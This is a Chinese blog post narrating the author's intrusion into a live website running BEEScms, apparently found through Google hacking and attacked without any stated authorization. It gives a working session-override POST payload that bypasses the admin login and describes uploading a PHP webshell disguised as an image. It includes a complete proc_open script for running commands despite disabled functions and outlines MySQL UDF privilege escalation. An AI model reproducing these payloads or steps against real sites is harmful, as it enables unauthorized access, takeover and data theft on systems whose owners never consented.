前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次渗透挖洞提权实战

记一次渗透挖洞提权实战

作者头像
HACK学习
发布2019-08-06 12:24:54
1.6K0
发布2019-08-06 12:24:54
举报
文章被收录于专栏:HACK学习

摘要:这是一次挖掘cms通用漏洞时发现的网站,技术含量虽然不是很高,但是也拿出来和大家分享一下吧,希望能给一部分人带来收获。


0x01 进入后台

在通过googlehack语法挖掘beescms时发现了这个站点

利用网上的payload,在/mx_form/mx_form.php?id=12页面使用hackbarPOST以下数据

代码语言:javascript
复制
_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

然后访问/admin便可以直接进入后台

0x02 拿shell

进入后台后在‘添加产品模块’处寻找到了上传点

尝试上马,但提示‘上传图片格式不正确’,于是上传图片马抓包,在repeater里更改后缀为php,然后go

根据回显没有看出是否上传成功,但也没说失败。经过寻找在‘上传图片管理’处找到

点击图片发现解析了,直接菜刀连接,拿到shell

0x03 绕过安全模式

拿到shell后进入终端查看权限,但却发现执行命令失败,可能远程启用了安全模式

经过在网上一番查找得出:要找到未禁用的php执行函数。先上传了一个查看phpinfo的脚本,找到已禁用的函数

发现proc_open函数未被禁用,于是找到如下php脚本

代码语言:javascript
复制
<?php
    $descriptorspec=array( //这个索引数组用力指定要用proc_open创建的子进程的描述符
        0=>array('pipe','r'), //STDIN
        1=>array('pipe','w'),//STDOUT
        2=>array('pipe','w') //STDERROR
    );
    $handle=proc_open('whoami',$descriptorspec,$pipes,NULL);
    //$pipes中保存的是子进程创建的管道对应到 PHP 这一端的文件指针($descriptorspec指定的)
    if(!is_resource($handle)){
    die('proc_open failed');
    }
    //fwrite($pipes[0],'ipconfig');
    print('stdout:<br/>');
    while($s=fgets($pipes[1])){
    print_r($s);
    }
    print('===========<br/>stderr:<br/>');
    while($s=fgets($pipes[2])){
    print_r($s);
    }
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($handle);
?>

上传后可以执行命令,成功绕过安全模式

0x04 提权

上图可以看出只是iis权限,能做的事很局限,所以要想办法提权。 菜刀中虽然不能执行命令,但是可以查看文件,于是找到了数据库配置文件

发现是mysql的数据库,想到udf提权,于是上传udf提权脚本(附件中)

登录后导出udf便可以执行命令了

提权成功,但是不可以添加用户,也不能开3389。


结语:希望路过的各位大佬可以指点迷津,也欢迎各位来找我交流探讨,感谢阅读。

参考链接:

PHP限制命令执行绕过https://www.cnblogs.com/R4v3n/articles/9081202.html

作者: PaperPen

来源:先知社区

如有侵权,请联系删除

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-06-09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 进入后台
  • 0x02 拿shell
  • 0x03 绕过安全模式
  • 0x04 提权
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档